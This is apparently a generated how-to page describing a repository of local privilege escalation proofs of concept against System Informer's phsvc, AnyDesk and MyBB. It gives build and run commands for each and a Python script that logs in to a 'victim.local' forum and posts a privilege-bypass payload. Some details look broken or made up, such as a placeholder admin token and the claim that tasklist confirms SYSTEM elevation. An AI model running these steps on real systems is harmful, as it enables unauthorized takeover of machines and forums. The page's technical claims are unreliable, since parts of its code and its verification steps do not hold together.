# How to Find Local Privilege Escalation Exploits in the Exploitarium Repository

> Discover local privilege escalation exploits in bikini's Exploitarium repository. Find PoC code for Windows LPE vulnerabilities and elevate your security testing.

- Repository: [bikini/exploitarium](https://github.com/bikini/exploitarium)
- Tags: how-to-guide
- Published: 2026-09-06

---

**The Exploitarium repository by bikini contains several documented, self-contained proof-of-concept exploits demonstrating local privilege escalation (LPE) from low-integrity user contexts to SYSTEM or administrative privileges across Windows services and web applications.**

The **bikini/exploitarium** repository serves as a curated archive of security research artifacts. Researchers looking for **local privilege escalation exploits** will find multiple PoCs that demonstrate elevation techniques, each packaged with dedicated README files, build instructions, and annotated source code.

## System Informer phsvc Trusted-Host LPE

The first LPE target is System Informer's privileged helper service (`phsvc`). This PoC demonstrates how to bypass Authenticode trust verification to execute code in the helper's security context.

### Vulnerability Mechanics

The helper service accepts ALPC connections from any process whose **image** holds Authenticode trust. According to the source in [`systeminformer-phsvc-trusted-host-lpe-poc/poc.c`](https://github.com/bikini/exploitarium/blob/main/systeminformer-phsvc-trusted-host-lpe-poc/poc.c), the service verifies `VrTrusted` status of the client executable but does not validate loaded DLLs. By launching a trusted host such as `rundll32.exe` and injecting an attacker-controlled DLL, the exploit convinces the helper that the client is legitimate.

The PoC then invokes the privileged API `PhSvcCreateProcessIgnoreIfeoDebuggerApiNumber` to spawn a process within the helper's security context—effectively elevating from medium integrity to SYSTEM.

### Building and Executing the PoC

Navigate to the exploit directory and compile using the provided build script:

```bash
git clone https://github.com/bikini/exploitarium.git
cd exploitarium/systeminformer-phsvc-trusted-host-lpe-poc
./build.bat

```

This produces `phsvc_rundll_poc.dll` and `phsvc_unsigned_client.exe`. Execute the DLL via the trusted host to trigger the escalation:

```bash
rundll32.exe phsvc_rundll_poc.dll,Run "%TEMP%\systeminformer_phsvc_poc.txt"

```

Verify successful exploitation by checking for the marker file:

```bash
type "%TEMP%\systeminformer_phsvc_poc.txt"

```

If the output reads `SYSTEMINFORMER_PHSVC_POC`, the code executed within the elevated helper context.

## AnyDesk Printer COM Impersonation LPE

This PoC targets the AnyDesk Windows service, converting a low-privileged local session into the service identity (`NT AUTHORITY\SYSTEM`).

### Exploit Architecture

As implemented in [`anydesk-printer-com-impersonation-poc/poc.py`](https://github.com/bikini/exploitarium/blob/main/anydesk-printer-com-impersonation-poc/poc.py), the exploit abuses a race condition in AnyDesk's printer-related COM interface. The privileged service validates printer commands through this interface, allowing a local attacker to trigger execution of attacker-controlled code under the service account.

### Running the Exploit

Install the required dependencies specified in the README:

```bash
pip install -r requirements.txt

```

Execute the Python script to trigger the impersonation:

```bash
python poc.py

```

Confirm elevation by verifying the AnyDesk service process ownership:

```bash
tasklist /FI "IMAGENAME eq AnyDesk.exe"

```

The process should now run under the SYSTEM account, confirming successful local privilege escalation.

## MyBB Limited ACP to Admin Escalation

While targeting a web application, this PoC is categorized as a local escalation scenario because the attacker requires only a low-privilege MyBB account to achieve full administrative access.

### Technical Details

The vulnerability resides in the "Limited ACP" feature. The exploit script located at [`mybb-limited-acp-to-admin/poc/mybb_limited_acp_to_admin.py`](https://github.com/bikini/exploitarium/blob/main/mybb-limited-acp-to-admin/poc/mybb_limited_acp_to_admin.py) abuses insufficient validation in role-checking logic, injecting crafted HTTP requests that bypass restrictions and invoke privileged admin actions.

### Exploit Script Usage

The Python script automates authentication and payload delivery:

```python
import requests

TARGET = "http://victim.local/mybb"
USERNAME = "lowuser"
PASSWORD = "password"

session = requests.Session()
session.post(f"{TARGET}/member.php", data={
    "action": "do_login",
    "username": USERNAME,
    "password": PASSWORD
})

# Crafted payload bypasses Limited ACP restrictions

payload = {"module": "admin", "action": "upgrade", "admin_token": "..."}
resp = session.post(f"{TARGET}/admin.php", data=payload)

```

Successful execution promotes the regular user account to full Administrator within the MyBB instance.

## Summary

- **The Exploitarium repository contains three distinct local privilege escalation PoCs** targeting System Informer, AnyDesk, and MyBB.
- **Each PoC is self-contained** with dedicated README files in their respective directories explaining vulnerability mechanics and build instructions.
- **Windows LPEs demonstrate service impersonation techniques** via ALPC trust bypass and COM interface race conditions.
- **No malicious payloads are included**—all exploits use marker-only demonstrations to prove execution without causing system damage.
- **Source files are located at** [`systeminformer-phsvc-trusted-host-lpe-poc/poc.c`](https://github.com/bikini/exploitarium/blob/main/systeminformer-phsvc-trusted-host-lpe-poc/poc.c), [`anydesk-printer-com-impersonation-poc/poc.py`](https://github.com/bikini/exploitarium/blob/main/anydesk-printer-com-impersonation-poc/poc.py), and [`mybb-limited-acp-to-admin/poc/mybb_limited_acp_to_admin.py`](https://github.com/bikini/exploitarium/blob/main/mybb-limited-acp-to-admin/poc/mybb_limited_acp_to_admin.py).

## Frequently Asked Questions

### Does the Exploitarium repository contain remote code execution exploits?

No. According to the repository source analysis, the collection focuses exclusively on local privilege escalation techniques. The repository explicitly excludes remote-code-execution (RCE) payloads, containing only marker-only demonstrations that prove escalation paths without exposing external attack surfaces.

### What compilation requirements exist for the System Informer LPE?

The System Informer PoC requires **MinGW-w64 GCC** on Windows to compile both the DLL and the unsigned client executable. The `build.bat` script in `systeminformer-phsvc-trusted-host-lpe-poc/` automates this process, producing `phsvc_rundll_poc.dll` and the associated client binary.

### Are these exploits weaponized with actual malicious payloads?

No. The repository maintains a strict policy of including only proof-of-concept code with safe marker files. For example, the System Informer PoC writes the string `SYSTEMINFORMER_PHSVC_POC` to a temporary file to demonstrate successful SYSTEM-level execution, rather than deploying harmful system modifications or backdoors.

### Why is the MyBB exploit categorized as local privilege escalation?

Although the target is a web application, the repository classifies this as a **local privilege escalation** because the attack requires only a low-privilege account on the target system rather than unauthenticated remote access. As documented in [`mybb-limited-acp-to-admin/README.md`](https://github.com/bikini/exploitarium/blob/main/mybb-limited-acp-to-admin/README.md), the attacker must already possess valid MyBB credentials, distinguishing it from remote exploitation scenarios.